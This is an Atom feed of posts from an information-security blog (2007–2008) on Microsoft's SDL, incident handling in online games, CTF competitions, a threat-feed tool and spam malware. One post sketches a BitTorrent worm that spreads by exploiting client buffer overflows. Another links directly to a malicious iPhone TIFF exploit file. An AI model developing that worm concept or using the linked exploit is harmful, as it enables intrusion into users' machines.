<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;AkAHRn87fip7ImA9WxNVEkQ.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763</id><updated>2009-10-23T06:52:17.106-05:00</updated><title>Vulnerable Minds</title><subtitle type="html">The thoughts and project of a premier Information Security think tank.</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/" /><link rel="hub" href="http://pubsubhubbub.appspot.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>99</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><link rel="self" href="http://feeds.feedburner.com/vulnerableminds/blog" type="application/atom+xml" /><feedburner:browserFriendly></feedburner:browserFriendly><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com" /><entry gd:etag="W/&quot;DE8FQnYzfip7ImA9WxVTE04.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-783288074865105339</id><published>2008-12-26T19:08:00.000-05:00</published><updated>2008-12-26T19:13:33.886-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-12-26T19:13:33.886-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="threat analysis" /><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="development" /><category scheme="http://www.blogger.com/atom/ns#" term="source code" /><category scheme="http://www.blogger.com/atom/ns#" term="poc/code" /><category scheme="http://www.blogger.com/atom/ns#" term="apple" /><title>SDL &amp; MS08-078</title><content type="html">I really enjoyed this article by the Microsoft Security Development Lifecycle team about how the SDL affected (or more importantly didn't affect) the recent IE 0-Day that gave a lot of people some sleepless nights recently. I may be becoming a Microsoft Security fanboy, even if I don't really like their OS. Their willingness to be open, and being honest about their failures and how to correct them makes me feel far better than Apple's continuous "nope, we're still perfect" mentality, undeserved as it is.&lt;br /&gt;
&lt;br /&gt;
That said, HD Moore's use of the techniques developed by Alex Sotirov and Mark Dowd to render most of Microsoft's protections useless was scary to see released. I'm not ready, with today's level of attackers, to go back to a Win2k level of (in)security. Or maybe I am....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-783288074865105339?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="related" href="http://blogs.msdn.com/sdl/archive/2008/12/18/ms08-078-and-the-sdl.aspx" title="SDL &amp; MS08-078" /><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/783288074865105339/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=783288074865105339" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/783288074865105339?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/783288074865105339?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2008/12/sdl-ms08-078.html" title="SDL &amp; MS08-078" /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;C0cFQX09fip7ImA9WxZWF04.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-6435898868139161472</id><published>2008-03-16T21:31:00.003-05:00</published><updated>2008-03-17T00:16:50.366-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-03-17T00:16:50.366-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="challenge" /><category scheme="http://www.blogger.com/atom/ns#" term="threat analysis" /><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="education" /><category scheme="http://www.blogger.com/atom/ns#" term="development" /><category scheme="http://www.blogger.com/atom/ns#" term="hardware hacking" /><category scheme="http://www.blogger.com/atom/ns#" term="self-learning" /><category scheme="http://www.blogger.com/atom/ns#" term="gaming" /><title>How to rescue orcs and spaceships</title><content type="html">Hello, my name is Scott, and I'm a gamer. Sometimes it keeps me up way too late at night, but I care about my pretend space ships and the billions of Interstellar Kredits I've earned with them, and I'd be pissed if something happened to them.&lt;br /&gt;&lt;br /&gt;A bit nerdy I realize, even for an information security blog, but it's true. There's no way to deny it, I do enjoy my online games. The fact is though I'm far from alone. 
Millions of people have been getting into one of the many massive multiplayer online games, from &lt;a href="http://worldofwarcraft.com/"&gt;World of Warcraft&lt;/a&gt; to &lt;a href="http://secondlife.com/"&gt;Second Life&lt;/a&gt;, from &lt;a href="http://www.lotro.com/"&gt;Lord of the Rings&lt;/a&gt; to &lt;a href="http://eve-online.com/"&gt;EVE Online&lt;/a&gt;. Millions of people have invested incredible (some would probably say insane) numbers of hours to their wizards, pod pilots, hobbits, and a variety of other characters, constituting a huge investment of both time and money ($15 dollars a month adds up). This has become my motivation as I decided to get my &lt;a href="http://www.giac.org/certifications/security/gcih.php"&gt;GIAC Certified Incident Handler&lt;/a&gt; Gold certification as the focus of my practical.&lt;br /&gt;&lt;br /&gt;I've been fascinated by the numerous security exploits in various online games. From &lt;a href="http://www.hackinthebox.org/modules.php?op=modload&amp;amp;name=News&amp;amp;file=article&amp;amp;sid=24700"&gt;EVE Online's database hack&lt;/a&gt; to &lt;a href="http://www.securityevaluators.com/sl/"&gt;Charlie Miller &amp;amp; Dino Dai Zovi's Second Life exploit&lt;/a&gt; it's interesting the unique factors that go into handling attacks in multiplayer online games. On one hand it's very much like a real economy, characters have assets, experience; money of some kind, and yet very much different (you can't exactly roll back a week of financial transactions in the real world).&lt;br /&gt;&lt;br /&gt;As a result I've chosen to make my practical for getting my GCIH Gold certificate a study on Incident Handling in online games focused on case studies of actual handling by various game operations teams. Here's my abstract:&lt;div&gt;&lt;blockquote&gt;&lt;br /&gt;While generalized incident handling practices are essential to any system or network they do not always meet the needs of specialized systems. 
These systems have needs that go above and beyond the usual, and must be handled with unique attention to specific hosts, their functions, interactions, and overall system architecture. However, in these specialized systems with similar functions there may be a way to generalize even the specialized requirements.&lt;br /&gt;&lt;br /&gt;As massive multiplayer online gaming (MMORPG) continues to grow, through games like World of Warcraft, Second Life, and EVE Online, the amount of money being funneled into them grows as well. Where the money goes so do the criminals and as such online games are increasingly coming to light as targets for malicious attackers. Whether attacking for financial gain or to simply gain the upper hand in gameplay more and more vulnerabilities are being discovered and exploited in online games.&lt;br /&gt;&lt;br /&gt;MMORPGs are unique environments; worlds with their own economies and populations, players with their own experiences and assets, all of which are unique and important to the users who have invested hours upon hours into their virtual personas. This combination and complexity leads to creating vibrant and unique environments that make these games interesting to play, but also creates a nightmare of tradeoffs that an incident handler must respond to in the event of a compromise.&lt;br /&gt;&lt;br /&gt;This leads to a need for unique handling of incidents and thus a unique set of processes to be followed. 
This does not supersede the generalized handling guidelines, nor could it be completely comprehensive, but there can be generalized incident handling guidelines for online games, a superset of generalized incident handling guidelines, such as those taught in the SANS 504 course.&lt;br /&gt;&lt;br /&gt;To this end I would like to research and develop such a set of specialized handling guidelines, based on the proven general handling techniques from SANS, for consideration of incident handlers working on massive multiplayer online games. These will focus on the unique challenges and options available to handlers in online games, and will be based in large part on case studies of how such incidents have already been handled in current online games. Additionally it will include a survey of major online games, trying to gain as much insight as possible into how they currently structure their handling, in order to add as much real world experience into this effort as possible.&lt;/blockquote&gt;&lt;br /&gt;Even though it results in writing a paper and being uber-whitehat I'm kind of excited about writing this paper. Looking at attacking/defending online games is just beginning to get attention. That is somewhat surprising in itself since the online gaming industry is already doing billions of dollars yearly and continues growing. Nothing is quite as much fun as breaking new ground.&lt;br /&gt;&lt;br /&gt;So now for you, my readers, I have a request: What are your thoughts and insights on my abstract for my paper and on the topic in general? I'm very eager to hear what you have to say. 
Feel free to leave comments, send email (scott.roberts[at]vulnerableminds[dot]com), send a carrier pigeon, I'm interested to hear what you have to say.&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-6435898868139161472?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/6435898868139161472/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=6435898868139161472" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/6435898868139161472?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/6435898868139161472?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2008/03/how-to-rescue-orcs-and-spaceships.html" title="How to rescue orcs and spaceships" /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></entry><entry gd:etag="W/&quot;CEIER3k4eSp7ImA9WxZQE00.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-3272442221139112397</id><published>2008-02-17T21:25:00.002-05:00</published><updated>2008-02-17T21:41:46.731-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-02-17T21:41:46.731-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="shmoocon" /><category scheme="http://www.blogger.com/atom/ns#" term="challenge" /><category scheme="http://www.blogger.com/atom/ns#" term="ctf" /><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="cons" /><title>Congratulations</title><content type="html">Shmoocon IV was a good time for all. A few good talks, lots of good times meeting up with people, and for Alice, Mike, Sean, and Tim it was good old fashioned hacker fun as all of them played in Shmoocon's annual "Hack or Halo" competition. 
Now Mike was last year's champion, and tied for first, but it was Tim who came in with the fastest time, and was this year's Hack or Halo winner.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Congratulations to Tim and everyone who participated.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-3272442221139112397?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/3272442221139112397/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=3272442221139112397" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/3272442221139112397?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/3272442221139112397?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2008/02/congratulations.html" title="Congratulations" /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;CEYAQXk_eyp7ImA9WxZRFEw.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-4683914234983698145</id><published>2008-02-07T00:29:00.000-05:00</published><updated>2008-02-07T14:22:20.743-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-02-07T14:22:20.743-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="challenge" /><category scheme="http://www.blogger.com/atom/ns#" term="ctf" /><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="defcon" /><category scheme="http://www.blogger.com/atom/ns#" term="self-learning" /><title>CTF is coming &amp; VM is recruiting</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://blog.washingtonpost.com/securityfix/Defcon14%20037.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px;" src="http://blog.washingtonpost.com/securityfix/Defcon14%20037.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;It may be a couple months away but Vulnerable Minds is getting ready for one of the best parts of the year. No, not Christmas, Defcon. Say what you want about the Riviera, but Defcon is definitely one of the biggest events in the hacking community. Last year Vulnerable Minds competed for the first time in the Defcon qualifier, hoping to earn a spot to play CTF in Vegas.&lt;div&gt; &lt;/div&gt;&lt;div&gt;Vulnerable Minds put in a good effort and did well for our first attempt. 
Out of 170 teams participating we ended up placing 30th, besting a number of very talented teams.&lt;br /&gt;&lt;br /&gt;So now it's time to turn our thoughts towards this year's competition. Vulnerable Minds is looking to build off last year's strong showing and do even better this year. To that end we are looking for talented hackers interested in playing CTF, qualifying, and going to DefCon to play. Reversers, sploit coders, forensics gurus, even defensive specialists. DC area is preferred.&lt;br /&gt;&lt;br /&gt;Not sure if this is your cup of tea? Check out &lt;a href="http://nopsr.us/"&gt;information about qualification and CTF&lt;/a&gt; from the past two years from the L@stplace team (Winners the past two years at Defcon).&lt;br /&gt;&lt;br /&gt;Interested? Fill out this &lt;a href="https://spreadsheets.google.com/viewform?key=pOwF3Za0c6CLch2CRNppwGw"&gt;handy contact form&lt;/a&gt; and we'll get in touch with you.&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-4683914234983698145?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="related" href="http://spreadsheets.google.com/viewform?key=pOwF3Za0c6CLch2CRNppwGw" title="CTF is coming &amp; VM is recruiting" /><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/4683914234983698145/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=4683914234983698145" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/4683914234983698145?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/4683914234983698145?v=2" /><link rel="alternate" type="text/html" 
href="http://blog.vulnerableminds.com/2008/02/ctf-is-coming-vm-is-recruiting.html" title="CTF is coming &amp; VM is recruiting" /><author><name>Scott J. Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;CUAESXw5eSp7ImA9WxZTFU4.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-6168055812429100254</id><published>2008-01-16T20:25:00.000-05:00</published><updated>2008-01-16T20:35:08.221-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-01-16T20:35:08.221-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="threat analysis" /><category scheme="http://www.blogger.com/atom/ns#" term="malware" /><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="black hat" /><category scheme="http://www.blogger.com/atom/ns#" term="networking" /><title>Nasty Idea of the Night: Bittorrent "Worm"</title><content type="html">It's been awhile, but then again, it's always been awhile, but I digress.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;So a nasty idea popped into my head tonight. Imagine attacking a BitTorrent by finding a buffer overflow in the client software and each host compromised checks its peer list and compromises all those as well? Add extra nasty and have the payload also check for other torrents and send the exploit payload to those as well.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Interesting points:&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Could move incredibly fast.&lt;/li&gt;&lt;li&gt;Complicated issues with client vulnerabilities vs protocol vulnerabilities. Unlikely to write an attack that works universally. &lt;/li&gt;&lt;li&gt;Price the RIAA would pay for such a thing? 
*What's the keystroke for infinity*&lt;/li&gt;&lt;li&gt;Tracker vulnerabilities.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;Just a random thought. More to come.&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-6168055812429100254?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/6168055812429100254/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=6168055812429100254" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/6168055812429100254?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/6168055812429100254?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2008/01/nasty-idea-of-night-bittorrent-worm.html" title="Nasty Idea of the Night: Bittorrent &quot;Worm&quot;" /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></entry><entry gd:etag="W/&quot;AkMDQXgzfCp7ImA9WB9RFEo.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-7862079893995264281</id><published>2007-10-15T14:08:00.001-05:00</published><updated>2007-10-15T15:01:10.684-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-10-15T15:01:10.684-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="threat analysis" /><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="development" /><category scheme="http://www.blogger.com/atom/ns#" term="project tango" /><category scheme="http://www.blogger.com/atom/ns#" term="webapps" /><category scheme="http://www.blogger.com/atom/ns#" term="job" /><category scheme="http://www.blogger.com/atom/ns#" term="pulse" /><title>Introducing Pulse</title><content type="html">Well if you've been doing DNS zone transfers on VulnerableMinds.com then you know, but for the rest of you &lt;a href="http://pulse.vulnerableminds.com/"&gt;Pulse&lt;/a&gt; has been a mystery. Begun as Project Tango, Pulse was meant to do one thing: give you a summarized, quick, complete look at the status of the information security threat landscape. It's a simple concept, but a lacking resource on the Internet.&lt;br /&gt;&lt;br /&gt;Pulse came out of my own needs as a threat analyst. Work leaves me with no shortage of projects, research, emails, meetings, and yet the imperative need to have a complete view of what vulnerabilities, exploits, and malcode are affecting all platforms. RSS feeds were a good start, but I quickly found myself reading dozens of feeds a day, many filled with useless information. 
Many I was able to replace or weed out, making it easy to get general news and the opinions, but I still needed more. I still needed information about threats, vulnerabilities and the code to exploit them, but struggled with so many feeds, and I still spent a huge amount of time reading unimportant information.&lt;br /&gt;&lt;br /&gt;To this end I decided I needed a tool of my own, something to bring all these feeds together into one place and yet eliminate the chaff, the low threat, the endless mailing list responses; the unnecessary.&lt;br /&gt;&lt;br /&gt;The result is &lt;a href="http://pulse.vulnerableminds.com/"&gt;Pulse&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Now Pulse is a huge part of my daily workflow. I start my day with it, along with &lt;a href="http://isc.sans.org/"&gt;SANS Internet Storm Center&lt;/a&gt; and &lt;a href="http://atlas.arbor.net/"&gt;Arbor Networks Atlas&lt;/a&gt; portal. I feel that this combination gives me all the information I need to know to be on the "pulse" of the infosec threat landscape. &lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;I'll quit waxing philosophical about the whys and hows. It's straightforward, but I feel like it meets a need that isn't easily being filled by other services available on the Internet. So take a look, use it, enjoy, and feel free to send me feedback. Pulse isn't done, it's not finished, it's just beginning. 
To find out more:&lt;div&gt;&lt;ul id=""&gt;&lt;li&gt;Introduction to Pulse - &lt;a href="http://docs.google.com/TeamPresent?fs=true&amp;amp;docid=dd9wn9f5_8655nhtf"&gt;Presentation&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Project Tango Specification - &lt;a href="http://docs.google.com/View?docid=dd9wn9f5_4fw3ktv"&gt;Document&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-7862079893995264281?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="related" href="http://pulse.vulnerableminds.com" title="Introducing Pulse" /><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/7862079893995264281/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=7862079893995264281" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/7862079893995264281?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/7862079893995264281?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/10/introducing-pulse.html" title="Introducing Pulse" /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry><entry gd:etag="W/&quot;A04MQXg-fSp7ImA9WB9REUk.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-5353072039439825238</id><published>2007-10-11T19:25:00.000-05:00</published><updated>2007-10-11T19:46:20.655-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-10-11T19:46:20.655-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="op/ed" /><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="development" /><category scheme="http://www.blogger.com/atom/ns#" term="poc/code" /><category scheme="http://www.blogger.com/atom/ns#" term="mobiles" /><category scheme="http://www.blogger.com/atom/ns#" term="apple" /><title>Took long enough...</title><content type="html">No, I'm not talking about how long it's been since our last blog post, I'm talking about the iPhone.&lt;br /&gt;&lt;br /&gt;I can't say I'm really surprised, except that maybe it took so long, but the iPhone hacking teams have announced a major remote exploit for the iPhone/iTouch. A file parsing exploit, the way many of us expected it would happen, this is remotely exploitable via a malicious .tiff file. It appears that this was created to make it possible to remotely unlock iPhones (a dubious prospect at best).&lt;br /&gt;&lt;br /&gt;For all the interest that the information security community had in the iPhone before it came out I've been shocked at how little has come out of our community. It's shocking how the majority of the "exploit" activity on the iPhone has been the traditional hackers, those who just seek to expand functionality. 
These "hacks" have been created to compensate for the lacking API, not those attempting to compromise this information rich device. Maybe good is stronger than awesome.&lt;br /&gt;&lt;br /&gt;More info &lt;a href="http://www.milw0rm.com/exploits/4522"&gt;here&lt;/a&gt; and the actual malicious tiff &lt;a href="http://www.milw0rm.com/sploits/10112007-iphone.tif"&gt;here&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-5353072039439825238?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/5353072039439825238/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=5353072039439825238" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/5353072039439825238?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/5353072039439825238?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/10/took-long-enough.html" title="Took long enough..." /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;Dk4AQ3o7eCp7ImA9WB5UFU0.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-5278122625157702184</id><published>2007-08-18T22:07:00.001-05:00</published><updated>2007-08-19T01:29:02.400-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-08-19T01:29:02.400-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="social engineering" /><category scheme="http://www.blogger.com/atom/ns#" term="malware" /><category scheme="http://www.blogger.com/atom/ns#" term="comments" /><category scheme="http://www.blogger.com/atom/ns#" term="reverse engineering" /><title>Love, as they say, is dangerous.</title><content type="html">As mentioned previously (and in a Defcon debriefing post that I have yet to actually publish), I've been looking into malware analysis and reverse engineering lately. There is still so much to learn, but what humble little I have learned has whetted my appetite for something more hands-on.&lt;br /&gt;&lt;br /&gt;By the way, I have finally discovered and fallen in love with Eldad Eilam's book, &lt;a href="http://www.amazon.com/Reversing-Secrets-Engineering-Eldad-Eilam/dp/0764574817"&gt;Reversing: Secrets of Reverse Engineering&lt;/a&gt;. Its collective 624 pages has a good balance of breadth and depth, and though I haven't finished it from cover-to-cover yet, I am already jumping the gun and recommending it to anyone interested in reversing. 
As the book has a good amount of assembly code, some background knowledge is advised, unless you're the type who likes to be inundated with information about things you can just barely understand, like doing 0 to 60 in 3 seconds flat.&lt;br /&gt;&lt;br /&gt;At any rate, in my quest to look for something to analyze, I discovered that one easily accessible treasure trove of malware and fishy (phishy! sorry, that was punny) sites is my spam folder... which is where I found this one:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_3B_BHQVFJS0/RsfbDGVhaXI/AAAAAAAAAFE/b01suSnNqg8/s1600-h/lame-spam.PNG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:right;cursor:pointer; cursor:hand;" src="http://bp2.blogger.com/_3B_BHQVFJS0/RsfbDGVhaXI/AAAAAAAAAFE/b01suSnNqg8/s400/lame-spam.PNG" border="0" alt=""id="BLOGGER_PHOTO_ID_5100285949307349362" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"I`m in hurry, but i still love you...?" Aw, I feel the warm fuzzies! Especially when said ecard (which has javascript code running in the background, so I &lt;b&gt;don't&lt;/b&gt; recommend you going to this link unless you know what you're doing) looks something like this...&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_3B_BHQVFJS0/RsfMhmVhaWI/AAAAAAAAAE8/kPzslc1AvU8/s1600-h/lame-spam2.PNG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:left;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_3B_BHQVFJS0/RsfMhmVhaWI/AAAAAAAAAE8/kPzslc1AvU8/s320/lame-spam2.PNG" border="0" alt=""id="BLOGGER_PHOTO_ID_5100269980618942818" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Humor aside, I am somewhat surprised by the sloppy effort of the attempt, especially when simple copy-pasting could have made it somewhat more convincing. 
This was obviously not a particularly brilliant example of social engineering technique, but it was entertaining nevertheless.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-5278122625157702184?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/5278122625157702184/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=5278122625157702184" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/5278122625157702184?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/5278122625157702184?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/08/love-as-they-say-is-dangerous.html" title="Love, as they say, is dangerous." 
